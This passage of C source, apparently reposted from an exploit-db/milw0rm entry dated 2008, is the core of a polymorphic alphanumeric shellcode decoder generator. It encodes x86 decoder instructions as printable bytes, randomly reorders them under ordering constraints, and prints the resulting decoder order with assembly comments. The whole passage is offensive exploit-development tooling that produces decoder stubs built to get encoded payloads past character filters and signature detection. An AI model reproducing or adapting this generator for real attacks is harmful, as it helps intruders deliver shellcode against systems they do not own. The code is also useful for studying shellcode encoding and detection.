    UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10};
    UCHAR instructions[11][3];
    UCHAR instruction_comments[11][28];
    UINT i,c, state;
    UCHAR *output;
    UCHAR *random_states;
    UCHAR *p_state[5];

    output = malloc(17);
    memset(output, 0, 17);
    memset(instructions, 0, 11*3);
    memset(instruction_comments, 0, 11*28);
    instructions[0][0] = '\x6a';         //j
    instructions[0][1] = xor_al1;        //
    instructions[1][0] = '\x58';         //X
    instructions[2][0] = '\x34';         //4
    instructions[2][1] = xor_al1;        //
    instructions[3][0] = '\x48';         //H
    instructions[4][0] = '\x34';         //4
    instructions[4][1] = jne_xor1;       //
    instructions[5][0] = '\x30';         //0
    instructions[5][1] = '\x42';         //B
    instructions[5][2] = size_decoder-1; //
    instructions[6][0] = '\x52';         //R
    instructions[7][0] = '\x52';         //R
    instructions[8][0] = '\x59';         //Y
    instructions[9][0] = '\x47';         //G
    instructions[10][0] = '\x43';        //C

    strcat(instruction_comments[0], "push XOR_AL1");
    strcat(instruction_comments[1], "pop eax");
    strcat(instruction_comments[2], "xor al, XOR_AL1");
    strcat(instruction_comments[3], "dec eax");
    strcat(instruction_comments[4], "xor al, JNE_XOR1");
    strcat(instruction_comments[5], "xor byte ptr [edx+size], al");
    strcat(instruction_comments[6], "push edx");
    strcat(instruction_comments[7], "push edx");
    strcat(instruction_comments[8], "pop ecx");
    strcat(instruction_comments[9], "inc edi");
    strcat(instruction_comments[10], "inc ebx");
    do {
        memset(p_state, 0, sizeof(UCHAR*)*5);
        random_states = shuffle(states, 11);
        
        //.*0.*1.*2.*3.*4.*5
        p_state[0] = memchr(random_states, 0, 11);
        if(p_state[0])
            p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states));
        if(p_state[1])
            p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states));
        if(p_state[1])
            p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states));
        if(p_state[1])
            p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states));
        if(p_state[1])
            p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states));

         //.*[67].*8
        if(p_state[1])
        {
            p_state[2] = memchr(random_states, 6, 11);
            p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states));
            if(!p_state[3])
            {
                p_state[2] = memchr(random_states, 7, 11);
                p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states));
            }
            if(p_state[3])
            {
                //.*1.*[67].*[67]
                if(p_state[2] && p_state[1] < p_state[2])
                    p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states));

                //.*0.*[67].*8.*1
                if(!p_state[4])
                    p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states));
                if(!p_state[4])
                    p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states));
                if(p_state[4])
                    p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states));
                if(p_state[4])
                    p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states));

                //.*[67].*8.*0.*1.*[67]
                if(!p_state[4])
                    p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states));
                if(p_state[4])
                    p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states));
                if(p_state[4])
                    p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states));
            }
        }

    }
    while (!p_state[4]);

    for (c=state=0; state<sizeof(states); state++) {
        i=0;
        while (instructions[random_states[state]][i] && i < 3) {
            output[c] = instructions[random_states[state]][i];
            i++;
            c++;
        }
    }

    printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n",
        random_states[0],
        random_states[1],
        random_states[2],
        random_states[3],
        random_states[4],
        random_states[5],
        random_states[6],
        random_states[7],
        random_states[8],
        random_states[9],
        random_states[10]
        );

    printf("%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n======================\n",
        instruction_comments[random_states[0]],
        instruction_comments[random_states[1]],
        instruction_comments[random_states[2]],
        instruction_comments[random_states[3]],
        instruction_comments[random_states[4]],
        instruction_comments[random_states[5]],
        instruction_comments[random_states[6]],
        instruction_comments[random_states[7]],
        instruction_comments[random_states[8]],
        instruction_comments[random_states[9]],
        instruction_comments[random_states[10]]);

    return output;
}

// milw0rm.com [2008-08-04]
 
Источник
www.exploit-db.com

Похожие темы